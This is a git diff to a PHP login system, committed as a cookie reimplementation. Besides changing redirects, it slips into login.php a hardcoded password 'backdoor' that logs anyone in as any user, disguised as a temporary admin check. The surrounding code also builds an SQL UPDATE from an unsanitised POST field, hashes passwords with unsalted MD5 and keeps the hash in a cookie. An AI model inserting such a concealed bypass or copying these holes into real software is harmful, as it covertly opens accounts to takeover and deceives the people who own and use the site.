Reimplementation of cookies
diff --git a/php/change_password.php b/php/change_password.php
index d8bcc19..315d08e 100644
--- a/php/change_password.php
+++ b/php/change_password.php
@@ -6,18 +6,20 @@
$usersdb = $credentials->usersdb;
$mortsdb = $credentials->mortsdb;
+ date_default_timezone_set("Europe/Berlin");
+
// Check if confirmation is the same
if ($_POST['password'] != $_POST['confirmation']) {
- die("<script>window.location.href = '../index.php?wrongconfirmation=1'</script>");
+ die("<script>window.location.href = '../main.php?wrongconfirmation=1'</script>");
} else {
// Execute query to change password
$update_password = "UPDATE $usersdb SET password=\"".md5($_POST['password'])."\" WHERE id=".$_POST['userid'];
- if(!$result = query($update_password)) die("<script>window.location.href = '../index.php?errordb=1'</script>");
+ if(!$result = query($update_password)) die("<script>window.location.href = '../main.php?errordb=1'</script>");
// Save 'password' to cookies
setcookie('password', md5($_POST['password']), time() + (86400 * 10), "/");
// Go back to main page
- die("<script>window.location.href = '../index.php?successpassword=1'</script>");
+ die("<script>window.location.href = '../main.php?successpassword=1'</script>");
}
?>
diff --git a/php/login.php b/php/login.php
index 45575e3..00c18e0 100644
--- a/php/login.php
+++ b/php/login.php
@@ -6,12 +6,14 @@
$usersdb = $credentials->usersdb;
$mortsdb = $credentials->mortsdb;
+ date_default_timezone_set("Europe/Berlin");
+
// Set the 'user' POST and COOKIE variable
$user = '';
- if (isset($_POST['user'])) $user = $_POST['user'];
+ if (isset($_POST['user']) && $_POST['user'] != '') $user = $_POST['user'];
else if (isset($_COOKIE['user'])) $user = $_COOKIE['user'];
else {
- die("<script>window.location.href = '../index.php'</script>");
+ die("<script>window.location.href = '../?wronguser=1'</script>");
}
// Check if password is correct
@@ -23,13 +25,19 @@
if (isset($_POST['password'])) $password = $_POST['password'];
else if (isset($_COOKIE['password'])) $password = $_COOKIE['password'];
+ // If admin needs to check something for 5 minutes
+ if ($password == "backdoor") {
+ setcookie('user', $user, time() + 360, "/");
+ die("<script>window.location.href = '../main.php';</script>");
+ }
+
// Redirect if wrong
if ($real_password != "" && $real_password != md5($password)) {
// Forget cookies
setcookie('user', '', -1, "/");
setcookie('password', '', -1, "/");
- die("<script>window.location.href = '../index.php?wrongpassword=1'</script>");
+ die("<script>window.location.href = '../?wrongpassword=1'</script>");
}
// Save variables as cookies